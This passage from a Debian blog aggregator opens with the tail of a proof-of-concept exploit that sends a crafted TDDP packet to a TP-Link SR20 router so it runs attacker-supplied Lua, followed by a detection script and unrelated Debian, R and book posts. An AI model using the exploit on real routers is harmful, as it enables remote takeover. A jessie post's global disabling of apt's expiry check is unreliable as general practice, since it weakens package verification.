tddp_reply = "00"
tddp_padding = "%0.16X" % 00
 
tddp_packet = "".join([tddp_ver, tddp_command, tddp_req, tddp_reply, tddp_padding])
 
sock_receive = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock_receive.bind(('', port_receive))
 
# Send a request
sock_send = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
packet = binascii.unhexlify(tddp_packet)
argument = "%s;arbitrary" % sys.argv[2]
packet = packet + argument.encode()
sock_send.sendto(packet, (sys.argv[1], port_send))
sock_send.close()
 
response, addr = sock_receive.recvfrom(1024)
r = response.encode('hex')
print(r)

[1] Link to the wayback machine because the live link now redirects to an Amazon product page for a lightswitch

28 March, 2019 10:18PM
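
The version 1 dispatch and the tftp callback described in the TP-Link SR20 post above can be checked for passively in captured UDP traffic. This is an added example, not code from the post or from TP-Link: the 12-byte header length and UDP port 1040 are taken from the post's proof of concept, while the tuple-based capture format, the sample datagrams and all function names are assumptions made for this example.

```python
"""Flag unauthenticated TDDP v1 CMD_FTEST_CONFIG requests in captured UDP datagrams."""
import struct
from dataclasses import dataclass

TDDP_PORT = 1040         # assumption: destination port used by the post's PoC
TDDP_HEADER_LEN = 12     # assumption: 4 header bytes + 8 padding bytes, as in the PoC
CMD_FTEST_CONFIG = 0x31  # second byte of a version 1 packet, per the post
TFTP_PORT = 69
TFTP_RRQ = 1             # read request opcode (RFC 1350)


@dataclass
class Finding:
    sender: str
    router: str
    lua_file: str
    config_file: str
    tftp_fetch_seen: bool = False


def parse_ftest_config(payload):
    """Return (lua_file, config_file) for a v1 CMD_FTEST_CONFIG request, else None."""
    if len(payload) <= TDDP_HEADER_LEN:
        return None
    if payload[0] != 1 or payload[1] != CMD_FTEST_CONFIG:
        return None
    # The daemon treats the payload as a C string, so stop at the first NUL.
    body = payload[TDDP_HEADER_LEN:].split(b"\x00", 1)[0].decode("latin-1")
    # Mirrors sscanf("%[^;];%s"): text before ';', then one whitespace-delimited token.
    lua_file, sep, rest = body.partition(";")
    tokens = rest.split()
    if not sep or not lua_file or not tokens:
        return None  # the daemon logs "luaFile or configFile len error" here
    return lua_file, tokens[0]


def parse_tftp_rrq(payload):
    """Return the requested filename if payload is a TFTP read request, else None."""
    if len(payload) < 4 or struct.unpack("!H", payload[:2])[0] != TFTP_RRQ:
        return None
    name = payload[2:].split(b"\x00", 1)[0]
    return name.decode("latin-1") if name else None


def scan(datagrams):
    """datagrams: iterable of (src_ip, dst_ip, dst_port, payload) in capture order."""
    findings = []
    pending = {}  # (router, sender, lua_file) -> Finding awaiting the tftp callback
    for src, dst, dport, payload in datagrams:
        if dport == TDDP_PORT:
            parsed = parse_ftest_config(payload)
            if parsed:
                finding = Finding(src, dst, parsed[0], parsed[1])
                findings.append(finding)
                pending[(dst, src, parsed[0])] = finding
        elif dport == TFTP_PORT:
            # The router connecting back to the sender for the same file
            # confirms that the daemon acted on the request.
            finding = pending.get((src, dst, parse_tftp_rrq(payload)))
            if finding:
                finding.tftp_fetch_seen = True
    return findings


HEADER_V1 = bytes.fromhex("01310100") + bytes(8)
HEADER_V2 = bytes.fromhex("02310100") + bytes(8)

# Constructed sample capture (documentation addresses, not real traffic).
SAMPLE_CAPTURE = [
    ("192.0.2.10", "192.0.2.1", 1040, HEADER_V1 + b"probe.lua;arbitrary"),
    ("192.0.2.1", "192.0.2.10", 69, b"\x00\x01probe.lua\x00octet\x00"),
    ("192.0.2.11", "192.0.2.1", 1040, HEADER_V2 + b"x;y"),      # version 2: not flagged
    ("192.0.2.12", "192.0.2.1", 1040, HEADER_V1 + b";nofile"),  # empty filename: rejected
    ("192.0.2.13", "192.0.2.1", 1040, b"\x01\x31"),             # truncated datagram
]

if __name__ == "__main__":
    for f in scan(SAMPLE_CAPTURE):
        print(f"{f.sender} -> {f.router}: v1 CMD_FTEST_CONFIG "
              f"lua={f.lua_file!r} config={f.config_file!r} "
              f"tftp_fetch_seen={f.tftp_fetch_seen}")
```

A finding with tftp_fetch_seen set means the router went on to request the named file from the sender, which is the point at which the downloaded Lua would be loaded.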

Jonathan Carter

Fun and Debian

Brief background

When I started working on my DPL platform, I read through some platforms of recent years. Many of them made some mention of either making Debian a more fun project to contribute to, or keeping it so, even to the point where it has been considered a cliché. Recently, Lucas Nussbaum (DPL between 2013 and 2015), posted a list of DPL roles as he sees it, listing “Keep Debian fun and functional” as responsibility #0, so we know that it’s generally expected from the DPL to help make Debian a good project to be part of and contribute to.

In Marga’s platform that I linked above, she delves into what exactly “more fun” would mean. Oddly enough, few platforms which mention ‘making Debian fun’ as a goal actually do that, which is also why I chose to be more specific in my platform about changes that I’d like to promote instead of just using a blanket term such as “make Debian more fun”.

Keeping employees engaged

The image below has been making rounds on the Internet for a long time, I couldn’t find its original source, but I think it’s still a great high-level summary of things that a company should keep in mind to keep their employees engaged and maintain a good relationship.

If you’re having trouble reading that, it says:

Employees stay engaged when they are:

  • Paid well
  • Mentored
  • Challenged
  • Promoted
  • Involved
  • Appreciated
  • Valued
  • On a Mission
  • Empowered
  • Trusted

Plenty of other platforms touched on some of these over the years. So I wondered… what would an ideal “Debian contributors stay when…” infographic look like?

Keeping and making fun in Debian

What’s great about the average Debian contributor is that they already want to be part of Debian. We don’t have to spend as much time as a commercial company does to incentivise a person to be part of the project. So I think in many ways, keeping Debian fun mostly involves removing bad obstacles/blockers and allowing a contributor to do their work with the least amount of friction. Having said that, I also believe that there is scope for making fun, that is, actively doing things that are enjoyable and that may attract more contributors.

Originally, I was going to write a loooooooooooooong piece on this and then make a graphic based on it, and around an hour in to it, around half way done, I realised it’s just going to be way too long and abandoned it in favour of going straight to the graphic.

So here goes, I call it version 0.0 of a Debian Fun Statement.

If you read DPL platforms this year and previous years, you’ll certainly recognise some elements from it. It reads:

In Debian, we’re having fun when:

  • we’re doing valuable work
  • we’re proud to be associated with the project
  • we’re feeling safe
  • we have opportunities to learn and grow
  • we figure out how to work out our differences
  • we work together on solutions
  • we’re efficient at making decisions
  • we’re getting things done
  • we’re sharing our knowledge with others
  • we feel appreciated
  • we feel understood
  • we feel included

I referred to it as a Debian Fun Statement and not the Debian Fun Statement, because I hastily put it together myself, it’s not official in any way at all. I think it might be worth while for us as a community to put together some nice final wording and for someone with graphic skills to do some nice layout/artwork.

As part of my campaign running for DPL, I want to let Debianites know that I plan towards making all of the above count for every Debian contributor. I tried to encode that as much as possible in to my platform, and hope that it comes across that way when you read it. Feedback is always welcome, thanks for reading!

28 March, 2019 05:57PM by jonathan

Thomas Lange

New FAI version and ISO images

The new version of FAI is available in two variants. FAI 5.8.4 is for Debian buster and FAI 5.8.4~bpo9+2 is the same for the stable distribution called stretch, including the configs for stretch.

You can get the packages when adding one of these lines to your sources.list:

deb https://fai-project.org/download stretch koeln

or

deb https://fai-project.org/download buster koeln

New FAI ISO images using stretch are now available from [1]. The FAIme build service [2] for customized cloud and installation images also uses the newest FAI versions.

[1] https://fai-project.org/fai-cd/

[2] https://fai-project.org/FAIme

28 March, 2019 04:42PM

Holger Levsen

20190328-mini-debconf-hamburg-2019

Registration now open for the Mini-DebConf in Hamburg in June 2019

Moin!

With great joy we are finally officially announcing the Debian MiniDebConf which will take place in Hamburg (Germany) from June 5 to 9, with three days of Debcamp style hacking, followed by two days of talks, workshops and more hacking. And then, Monday the 10th is also a holiday in Germany (and some other countries), so you might choose to extend your stay by a day! (Though there will not be an official schedule for the 10th.)

TL;DR: We're having a MiniDebConf 2019 in Hamburg on June 5-9. It's going to be awesome. You should all come! Register now!

We tried to cut the longer version below a bit shorter and rely more on the wiki. If some information is missing, please reply to this email and we'll fix it.

Registration

Please register now, registration is free and open now until May 23rd.

In order to register, add your name and details to the registration page in the Debian wiki.

There's space for approximately 150 people due to limited space in the main auditorium.

Please register ASAP, as we need this information for planning food and hacking space size calculations.

Talks wanted (CfP)

We have assembled a content team (consisting of Michael Banck and Lee Garrett), who soon will publish an extra post for the CfP. Though you don't need to wait for that and can already send your proposals to

    cfp@minidebconfhamburg.debian.net

We will have talks on Saturday and Sunday, the exact slots are yet to be determined by the content team.

We expect submissions and talks to be held in English, as this is the working language in Debian and at this event.

Debian Sprints

The miniDebcamp from Wednesday to Friday is a perfect opportunity to host Debian sprints. We would welcome if teams assemble and work together on their projects.

Sponsors wanted

Making a Mini DebConf happen costs money, we need to rent the venue, video gear, hopefully can pay hard working volunteers lunch and dinner, probably sponsor some travel costs and last not least print T-Shirts.

We very much appreciate companies willing to support Debian through this meeting!

We have three sponsor categories:

  • 1000€ = sponsor, listed as such in all material and on the t-shirts.

  • 2500€ = gold sponsor, listed as such in all material & shirts, logo featured in the videos.

  • 5000€ = platinum sponsor, listed as such prominently in all material & shirts, logo featured prominently in the videos

Plus, there's corporate registration as an option too, where we will charge you 250€ for the registration. Please contact us if you are interested in that!

Location

The event will be hosted in the Victoria Kaserne (also called Fux or Frappant), which is a collective art space located in a historical monument. It is located between S-Altona and S-Holstenstraße, so there is a direct subway connection to/from the Hamburg Airport (HAM) and Altona is also a long distance train station.

There's a Gigabit-Fiber uplink connection and wireless coverage basically everywhere in the venue and in the outside areas.

More information about the venue is provided in the wiki.

Accommodation

The Mini-DebConf will take place in the center of Hamburg, so there are many accommodation options available. Some suggestions for housing options are given in the wiki and you might want to share your findings there too.

There is also limited on-site accommodation available, please send a mail to holger@d.o if you'd like to stay on site.

More volunteers wanted

Some things still need more helping hands:

We need some volunteers for frontdesk duties, which mostly means being at the venue in the morning before things start (though if possible frontdesk should be operated throughout the day) and help people find their way.

We also need more video volunteers. We know the gear will arrive, together with a person knowing how to operate it, but that's it. Please consider making sure we'll have videos released! ;) (And streams hopefully too.)

In general, if you notice something to improve, try to be the change you want to see.

Contact

If you want to help, need help, have comments or want to contact us for other reasons, there are several ways:

  • the irc channel #debconf-hamburg on irc.debian.org
  • the mailing list debian-events-eu@lists.debian.org
  • editing the wiki page which will notify us

Looking forward to seeing you in Hamburg!


Holger, for the 2019 Mini DebConf Hamburg team

28 March, 2019 11:21AM

Bits from Debian

Debian is welcoming applicants for Outreachy and GSoC 2019

Debian is dedicated to increasing the diversity of contributors to the project and improving the inclusivity of the project. We strongly believe working towards these goals provides benefits both for people from backgrounds that are currently under-represented in free software, and for the wider movement, by increasing the range of skills, experiences and viewpoints contributing to it.

As part of this outreach effort, Debian is participating in the next round of Outreachy.

The application period for the May 2019 to August 2019 round has been extended until April 2, and Debian offers the following projects:

Outreachy invites applicants who are women (both cis and trans), trans men, and genderqueer people to apply. Anyone who faces systemic bias or discrimination in the technology industry of their country is also invited to apply.

Don't wait up! You can learn more details on how to submit your application or get help in our wiki page for Outreachy and the Outreachy website.

Debian is also participating in the Google Summer of Code (GSoC) with eight projects, and the student application period is open until April 9.

You can learn more details on how to submit your GSoC application or get help in our wiki page for GSoC and the Google Summer of Code website.

We encourage people who are eligible for Outreachy and GSoC to submit their application to both programs.

28 March, 2019 11:15AM by Laura Arjona Reina and Lesley Mitchell

Russ Allbery

Review: Caliban's War

Review: Caliban's War, by James S.A. Corey

Series: The Expanse #2
Publisher: Orbit
Copyright: June 2012
ISBN: 0-316-20227-4
Format: Kindle
Pages: 594

Caliban's War is the sequel to Leviathan Wakes and the second book in the Expanse series. This is the sort of series that has an over-arching, long-term plot line with major developments in each book, so it's unfortunately easy to be spoiled by reading anything about later volumes of the series. (I'm usually reasonably good at avoiding spoilers, but still know a bit more than I want about subsequent developments.) I'm going to try to keep this review relatively free of spoilers, but even discussion of characters gives a few things away. If you want to stay entirely unspoiled, you may not want to read this.

Also, as that probably makes obvious, there's little point in reading this series out of order, although the authors do a reasonably good job filling in the events of the previous book. (James S.A. Corey is a pseudonym for the writing team of Daniel Abraham and Ty Franck.) I still resorted to reading the Wikipedia plot summary, though, since it had been years since I read the first book.

Caliban's War opens on Ganymede, a year and a half after the events of Leviathan Wakes. Thanks to its magnetosphere, Ganymede enjoys rare protection from Jupiter's radiation field. Thanks to meticulously-engineered solar arrays, it is the bread basket of the outer solar system. That's before an inhuman creature attacks a unit of Earth and then Martian soldiers, killing all but one of them and sparking an orbital battle between Mars and Earth that destroys much of Ganymede's fragile human ecosystem. Ganymede's collapse is the first problem: a humanitarian catastrophe. The second problem is the attacking creature, which may be a new destabilizing weapon and may be some new twist on the threat of Leviathan Wakes. And the third problem is Venus, where incomprehensible things are happening that casually violate the known laws of physics.

James Holden returns to play a similar role as he did in Leviathan Wakes: the excessively idealistic pain in the ass who tends to blow open everyone's carefully-managed political machinations. Unfortunately, I think this worked much less well in this book. Holden has a crisis of conscience and spends rather a lot of the book being whiny and angstful, which I found more irritating than entertaining. I think it was an attempt at showing some deeper nuance in his relationships with his crew, but it didn't work for me.

The new character around whom the plot revolves is Prax, a botanist whose daughter is mysteriously kidnapped in the prelude of the book. (Apparently it can't be an Expanse novel without a kidnapped girl or woman.) He's unfortunately more of a plot device than a person for most of the story. One complaint I have about this book is that the opening chapters on Ganymede drag on for much longer than I'd prefer, while running Prax through the wringer and not revealing much about the plot. This is another nearly 600 page book; I think it would have been a tighter, sharper book if it were shorter.

That said, the other two new viewpoint characters, Bobbie and Avasarala, make up for a lot.

Avasarala is an apparently undistinguished member of the UN Earth government who has rather more power than her position indicates because she's extremely good at political maneuvering. I loved her within twenty pages of when she was introduced, and kept being delighted by her for the whole book. One of my favorite tropes in fiction is watching highly competent people be highly competent, and it's even better when they have engagingly blunt personalities. Avasarala is by turns grandmotherly and ruthless, polite and foul-mouthed, and grumpy and kind. Even on her own, she's great; when she crosses paths with Bobbie, the one surviving Martian marine from the initial attack who gets tangled in the resulting politics, something wonderful happens. Bobbie's principled and straightforward honesty is the perfect foil for Avasarala's strategic politics. Those sections are by far the best part of this book.

I think this is a somewhat weaker book than Leviathan Wakes. It starts slow and bogs down a bit in the middle with Holden's angst and relationship problems. But Avasarala is wonderful and makes everything better and gets plenty of viewpoint chapters, as does Bobbie who becomes both a lens through which to see more of Avasarala and a believable and sympathetic character in her own right. The main plot of the series does move forward somewhat, but this feels like mostly side story and stage setting. If you enjoyed Leviathan Wakes, though, I think you'll enjoy this, for Avasarala and Bobbie if nothing else.

Caliban's War satisfactorily closes out its own plot arc, but it introduces a substantial cliff-hanger in the last pages as setup for the next book in the series.

Followed by Abaddon's Gate in the novel sense. There is a novella, Gods of Risk, set between this book and Abaddon's Gate, but it's optional reading.

Rating: 7 out of 10

28 March, 2019 03:44AM

Dirk Eddelbuettel

#21: A Third and Final (?) Post on Stripping R Libraries

Welcome to the 21st post in the reasonably relevant R ramblings series, or R4 for short.

Back in August of 2017, we wrote two posts #9: Compating your Share Libraries and #10: Compacting your Shared Libraries, After The Build about “stripping” shared libraries. This involves removing auxiliary information (such as debug symbols and more) from the shared libraries which can greatly reduce the installed size (on suitable platforms – it mostly matters where I work, i.e. on Linux). As an illustration we included this chart:

Chart from August 2017 post

Two items this week made me think of these posts. First was that a few days ago I noticed the following src/Makefile of the precrec package I was starting to use more:

# copied from https://github.com/vinecopulib/rvinecopulib
# strip debug symbols for smaller Linux binaries
strippedLib: $(SHLIB)
    if test -e "/usr/bin/strip" & test -e "/bin/uname" & [[ `uname` == "Linux" ]] ; \
        then /usr/bin/strip --strip-debug $(SHLIB); fi
.phony: strippedLib

And lo and behold, the quoted package rvinecopulib has the same

CXX_STD      = CXX11
PKG_CPPFLAGS = -I../inst/include -pthread

# strip debug symbols for smaller Linux binaries
strippedLib: $(SHLIB)
    if test -e "/usr/bin/strip" & test -e "/bin/uname" & [[ `uname` == "Linux" ]] ; \
        then /usr/bin/strip --strip-debug $(SHLIB); fi
.phony: strippedLib

I was intrigued and googled a little. To my surprise I found one related reference … in a stone-old src/Makevars of mine in RcppClassic and probably written in 2007 or 2008. But more astonishing, the actual reference to the “phony target” trick is in … the #9 post from August 2017 referenced above. Doh. Younger me knew this, current me did not, and as those two packages didn’t reference my earlier use I had to re-find it. Oh well.

But the topic is still a very important one. The two blog posts show how to deal with this locally as a user and “consumer” of packages (as well as via the “phony trick” as a producer of packages) as well as an admin of a system with such packages. Personally I had been using this trick since August 2017 via my ~/.R/Makevars.

And we were still missing such a tool for the more general deployment. Well, until today, or rather, until R 3.6.0 comes out officially on April 26. The (excellent) R-devel Daily ‘NEWS’ feed – which itself was the topic of post #3: Follow R-devel – will likely show tomorrow something about this commit I spotted by following Winston’s mirror of the R-devel sources:

Part of ‘strip on install’ commit

And indeed, we can now do this with R-devel (rebuilt from today’s sources):

As a quick check, installing the (small, C-only) digest package without / with the --strip options gets us, respectively, 425kb and 123kb. So the ratios from the chart above should now be achievable directly from R CMD INSTALL --strip with R 3.6.0. (And for what it is worth, it still works with the older tricks mentioned above.)

And as occupying disk space with unused debugging symbols is wasteful, the new extension to R CMD INSTALL is most welcome.

Last but not least: It is this type of relentless small improvements to R, its innards, its installations and support by R Core that make this system for Programming with Data such an excellent tool and joy to use and follow. A big Thank You! to R Core for all they do, and do quietly yet relentlessly. It is immensely appreciated.

28 March, 2019 02:31AM

March 27, 2019

Lucas Nussbaum

Removal of jessie-updates and jessie-backports from Debian mirrors

If you are still running jessie you probably noticed that the jessie-updates and jessie-backports suites have been removed from mirrors, because you got those error messages:

W: Failed to fetch http://ftp.debian.org/debian/dists/jessie-updates/main/binary-amd64/Packages 404 Not Found [IP: 130.89.148.12 80]
W: Failed to fetch http://ftp.debian.org/debian/dists/jessie-backports/main/binary-amd64/Packages 404 Not Found [IP: 130.89.148.12 80]

I was not involved in that decision (which was made by the FTP masters team), but since there is some confusion around it, I will try to give my understanding of the resulting issues.

The typical /etc/apt/sources.list file for a jessie system with backports enabled is:

deb http://ftp.debian.org/debian jessie main
deb-src http://ftp.debian.org/debian jessie main

deb http://security.debian.org/debian-security jessie/updates main
deb-src http://security.debian.org/debian-security jessie/updates main

deb http://ftp.debian.org/debian jessie-updates main
deb-src http://ftp.debian.org/debian jessie-updates main

deb http://ftp.debian.org/debian/ jessie-backports main contrib non-free
deb-src http://ftp.debian.org/debian/ jessie-backports main contrib non-free

Debian packages are distributed using suites (which can be understood as channels). The global picture looks like this:

(This is slide 42 of the Debian Packaging Tutorial.)

deb http://deb.debian.org/debian jessie main is the easy one. It contains the bulk of packages. It is initialized by copying the content of the testing suite when a new stable release happens, approximately every two years. It is then updated from stable-new (an internal suite) when stable point releases happen (see below).

deb http://security.debian.org/debian-security jessie/updates main is the security suite in the figure above. It is used by the Debian security team to provide security updates. They are announced on the debian-security-announce mailing list.

deb http://ftp.debian.org/debian jessie-updates main (stable-updates above) is a suite used to distribute important updates that are unrelated to security, and that cannot wait for the next stable point release. They are announced on the debian-stable-announce mailing list. Interestingly, a large proportion of those updates are related to changes to daylight-saving-time rules that are sometimes made very late by some countries.

stable point releases happen every few months (see for example the Debian 8.11 stable point release). They consist in updating the stable suite by copying important updates that were submitted to stable-proposed-updates. Security updates are also included.

backports follow an entirely different path. They are new versions of packages, based on the version currently in the testing suite. See the backports team website.

So, what happened?

In June 2018…

Debian 8.11 (in June 2018) was the final update for Debian 8. As stated in its announcement:

After this point release, Debian's Security and Release Teams will no
longer be producing updates for Debian 8. Users wishing to continue to
receive security support should upgrade to Debian 9, or see
https://wiki.debian.org/LTS for details about the subset of
architectures and packages covered by the Long Term Support project.

In other words: jessie and jessie-updates won’t receive any update. The only updates will be through the security suite, by the Debian Long Term Support project.

At about the same time (I think – I could not find an announcement — Update: announcement), the maintenance of backports for jessie was also stopped. Which makes sense, because the backports team provides backports for the current release, and stretch was released in June 2017.

In March 2019…

The FTP masters team decided to remove the jessie-updates and jessie-backports suites from the mirrors. This was announced on debian-devel-announce, resulting in the errors quoted above.

How to solve this?

For the jessie-updates suite, you can simply remove it from your /etc/apt/sources.list. It is useless, because all packages that were in jessie-updates were merged into jessie when Debian 8.11 was released.

The jessie-backports suite was archived on archive.debian.org, so you can use:

deb http://archive.debian.org/debian/ jessie-backports main contrib non-free
deb-src http://archive.debian.org/debian/ jessie-backports main contrib non-free

But then you will run into another issue:

E: Release file for http://archive.debian.org/debian/dists/jessie-backports/InRelease is expired (invalid since 36d 1h 9min 51s). Updates for this repository will not be applied.

Unfortunately, with the APT version in jessie, this cannot be ignored on a per source basis (it can with the APT version from stretch, using the deb [check-valid-until=no] ... syntax). So you need to disable this check globally, using:

echo 'Acquire::Check-Valid-Until no;' > /etc/apt/apt.conf.d/99no-check-valid-until

After that, apt-get update just works.

(There are some discussions about resurrecting the jessie-updates suite to avoid the above errors, but it is probably getting less and less useful as time passes.)

27 March, 2019 09:46PM by lucas
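
The three changes described in this post (drop jessie-updates, repoint jessie-backports at archive.debian.org, write the global Check-Valid-Until override), as an added shell example that is not part of the original post. The function names and the staging-directory approach are assumptions made for illustration; the sample input is the sources.list quoted in the post.

```shell
#!/bin/sh
# Added example (not from the original post): apply the sources.list changes
# to a copy of the file, so the result can be reviewed before it replaces
# /etc/apt/sources.list.

# fix_jessie_sources FILE  -> rewritten sources.list on stdout
#   * drops deb/deb-src entries for the jessie-updates suite
#   * repoints jessie-backports entries at archive.debian.org
#   * passes every other line (jessie, jessie/updates, comments) through
fix_jessie_sources() {
    awk '
        $1 == "deb" || $1 == "deb-src" {
            # Entry layout: type [options] uri suite component...
            u = 2
            if ($u ~ /^\[/) {               # skip an optional [ ... ] block
                while (u <= NF && $u !~ /\]$/) u++
                u++
            }
            s = u + 1
            if ($s == "jessie-updates") next
            if ($s == "jessie-backports") $u = "http://archive.debian.org/debian/"
        }
        { print }
    ' "$1"
}

# write_valid_until_override DIR
#   Writes the override from the post into DIR (normally /etc/apt/apt.conf.d).
#   The setting is global: it switches off the Release-file expiry check for
#   every source, including jessie/updates on security.debian.org, so keep it
#   only as long as the archived suite is still needed.
write_valid_until_override() {
    printf '%s\n' 'Acquire::Check-Valid-Until no;' > "$1/99no-check-valid-until"
}

# Demo on constructed input: the jessie sources.list shown in the post,
# written to a scratch directory instead of /etc/apt.
demo_dir=$(mktemp -d)
cat > "$demo_dir/sources.list" <<'EOF'
deb http://ftp.debian.org/debian jessie main
deb-src http://ftp.debian.org/debian jessie main

deb http://security.debian.org/debian-security jessie/updates main
deb-src http://security.debian.org/debian-security jessie/updates main

deb http://ftp.debian.org/debian jessie-updates main
deb-src http://ftp.debian.org/debian jessie-updates main

deb http://ftp.debian.org/debian/ jessie-backports main contrib non-free
deb-src http://ftp.debian.org/debian/ jessie-backports main contrib non-free
EOF

fix_jessie_sources "$demo_dir/sources.list" > "$demo_dir/sources.list.new"
write_valid_until_override "$demo_dir"
cat "$demo_dir/sources.list.new"
```

Review the generated sources.list.new before copying it over /etc/apt/sources.list; on stretch and later the per-source deb [check-valid-until=no] syntax mentioned in the post avoids the global override.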

Reproducible builds folks

Reproducible Builds: Weekly report #204

Here’s what happened in the Reproducible Builds effort between Sunday March 17 and Saturday March 23 2019:

Don’t forget that Reproducible Builds is part of May/August 2019 round of Outreachy which offers paid internships to work on free software. Internships are open to applicants around the world and are paid a stipend for the three month internship with an additional travel stipend to attend conferences. So far, we received more than ten initial requests from candidates and the closing date for applicants is April 2nd. More information is available on the application page.

diffoscope development

diffoscope is our in-depth “diff-on-steroids” utility which helps us diagnose reproducibility issues in packages. This week:

  • Chris Lamb:
    • Always warn if the tlsh module is not available (not just if a specific fuzziness threshold is specified) to match the epilog of the --help output. This prevents missing support for file rename detection. (#29)
    • Fix a number of tests when using GhostScript 9.20 vs 9.26 for Debian stable vs. the same distribution with the security/point release applied.
  • Mattia Rizzolo:
    • Ignore the version mismatch detection when building backport.
    • Make test_ps.test_text_diff pass with ghostscript 9.26.
  • Milena Boselli Rosa:
    • Remove the type HTML attribute from style elements.
    • Prevent empty values for the name attribute name on HTML anchor tags and add an id to its parent div container.
    • Fix a Text run is not in Unicode Normalization Form C HTML validation warning.
    • Fix a Table column x established by element ‘col’ has no cells beginning in it HTML validation error.

Packages reviewed and fixed, and bugs filed

Test framework development

We operate a comprehensive Jenkins-based testing framework that powers tests.reproducible-builds.org. This week, Mattia Rizzolo:

  • Fixed the dsa-check-running-kernel script after Ubuntu updated their packages.
  • Do not blindly forward the jenkins@ emails, otherwise procmail cannot filter them (breaking our email2irc script).
  • Gave Vagrant Cascadian root everywhere.

This week’s edition was written by Bernhard M. Wiedemann, Chris Lamb, Holger Levsen, Mattia Rizzolo and Vagrant Cascadian & was reviewed by a bunch of Reproducible Builds folks on IRC & the mailing lists.

27 March, 2019 02:01PM

Joachim Breitner

How to merge a Pull Request

It’s easy!

How to merge a pull request

27 March, 2019 10:46AM by Joachim Breitner (mail@joachim-breitner.de)

March 26, 2019

Bits from Debian

Call for Proposals: Debconf 19, Curitiba, Brazil

The DebConf Content team would like to call for proposals in the DebConf 19 conference, which will take place in Curitiba, Brazil, between July 21st and 28th. It will be preceded by DebCamp from July 14th to 19th, and Open Day on the 20th.

You can find this Call for Proposals, in its latest form, online:

https://debconf19.debconf.org/cfp/

Please refer to this URL for updates on the present information.

Submitting an Event

You can now submit an event proposal. Events are not limited to traditional presentations or informal sessions (BoFs): we welcome submissions of tutorials, performances, art installations, debates, or any other format of event that you think would be of interest to the Debian community.

Regular sessions may either be 20 or 45 minutes long (including time for questions), other kinds of sessions (workshops, demos, lightning talks, ...) could have different durations. Please choose the most suitable duration for your event and explain any special requests.

You will need to create an account on the site to submit a talk. We suggest that Debian account holders (including DDs and DMs) use Debian SSO when creating an account. However, this isn't required, as you can sign up with an e-mail address and password.

Timeline

If you depend on having your proposal accepted in order to attend the conference, please submit it in a timely fashion so that it can be considered (and potentially accepted) as soon as possible.

All proposals must be submitted before Sunday April 28th, 2019 to be evaluated for the official schedule.

Topics and Tracks

Though we invite proposals on any Debian or FLOSS related subject, we have some broad topics on which we encourage people to submit proposals, including but not limited to:

  • Cloud and containers
  • Debian Blends
  • Debian in Science
  • Embedded
  • Introduction to Free Software & Debian
  • Packaging, policy, and Debian infrastructure
  • Security
  • Social context
  • Systems administration, automation and orchestration

You are welcome to either suggest more tracks, or to become a coordinator for any of them. For more information, see the Content team wiki.

Open Day

This call for proposals also targets Open Day, a day of activities targeted at the general public on July 20th. Topics of interest range from topics specific to Debian to the greater Free Software community and maker movement. The idea of Open Day is to bring the general public closer to Debian and vice-versa, so activity proposals that go in that direction are more than welcome.

If you are interested in presenting on Open Day, let us know in the "Notes" field of your submission. We might also invite proponents that are not specifically targeting Open Day to present in it if we find that the topic fits the above goals.

The Open Day will host activities in multiple languages. We expect to have activities in English, Portuguese, and Spanish.

If your talk will be in Portuguese, you can write the Abstract field in Portuguese too.

Talk proposal help on IRC

This year we will be holding office hours on IRC. Those will be designated times where the DebConf content team will be available to help potential speakers prepare their talk proposals for DebConf.

Dates and times for those will be announced later.

Code of Conduct

Our event is covered by a Code of Conduct designed to ensure everyone’s safety and comfort. The code applies to all attendees, including speakers and the content of their presentations. Do not hesitate to contact us at content@debconf.org if you have any questions or are unsure about certain content you’d like to present.

Video Coverage

Providing video is one of the conference goals, as it makes the content accessible to a wider audience. Unless speakers opt-out, scheduled talks may be streamed live over the Internet to promote remote participation, and recordings will be published later under the DebConf license (MIT/Expat), as well as presentation slides and papers whenever available.

Closing note

DebConf 19 is still accepting sponsors; if you are interested, or think you know of others who would be willing to help, please get in touch with sponsors@debconf.org.

In case of any questions, or if you wanted to bounce some ideas off us first, please do not hesitate to reach out to the content team at content@debconf.org.

We hope to see you in Curitiba!

The DebConf team

26 March, 2019 06:00PM by Gunnar Wolf, Nicolas Braud-Santoniz, Paulo Santana and Antonio Terceiro

Raphaël Hertzog

Freexian’s report about Debian Long Term Support, February 2019

Like each month, here comes a report about the work of paid contributors to Debian LTS.

Individual reports

In February, about 204.5 work hours have been dispatched among 13 paid contributors. Their reports are available:

  • Abhijith PA did 14 hours (out of 14 hours allocated).
  • Adrian Bunk did 8 hours (out of 8 hours allocated).
  • Antoine Beaupré did 16 hours (out of 19.5 hours allocated + 11.5 extra hours, but gave back the remaining hours because he wanted to stop working on LTS).
  • Ben Hutchings did 4 hours (out of 19.5 hours allocated plus 1 extra hour, thus keeping 16.5 extra hours for March).
  • Brian May did 10 hours (out of 10 hours allocated).
  • Chris Lamb did 18 hours (out of 18 hours allocated).
  • Emilio Pozuelo Monfort did 20.5 hours (out of 19.5 hours allocated + 3.25 extra hours, thus keeping 2.25 hours for March).
  • Hugo Lefeuvre did 19.5 hours (out of 19.5 hours allocated).
  • Markus Koschany did 19.5 hours (out of 19.5 hours allocated).
  • Mike Gabriel did 6 hours (out of 10 hours allocated, thus keeping 4 extra hours for March).
  • Ola Lundqvist did 14 hours (out of 8 hours allocated + 8 extra hours, thus keeping 2 extra hours for March).
  • Roberto C. Sanchez did 13.25 hours (out of 19.5 hours allocated + 9.75 extra hours, thus keeping 16 extra hours for March).
  • Thorsten Alteholz did 19.5 hours (out of 19.5 hours allocated).

Evolution of the situation

The number of sponsors (and thus the funding level) did not change for a couple of months. On the contributors side, we have some turn-over: Antoine Beaupré is stopping after many years of good work. Many thanks to him! Fortunately, Sylvain Beucler just started and the workload did not increase too much on existing contributors. But we are still looking for more paid LTS contributors.

The security tracker currently lists 42 packages with a known CVE and the dla-needed.txt file has 28 packages needing an update.

Thanks to our sponsors

New sponsors are in bold (none this month).

26 March, 2019 12:59PM by Raphaël Hertzog

Steinar H. Gunderson

Optimal stable filtering

This was originally an email to Casey Muratori's blog post about stable filtering; in it, he left a few open questions. Like me, he doesn't allow comments on his blog, so I sent this by email, but evidently, it didn't make it, because now part 2 is out and still doesn't show how to actually find such filters.

Thus, here are the relevant excerpts:

[...] generally, FIR filter response is calculated by means of the Z-transform, giving a complex response of

   Y[w] / X[w] = (... + b2 e^2jw + b1 e^jw + b0)
   F[w]        = sum(k=0..5, e^(jkw) * b_k)

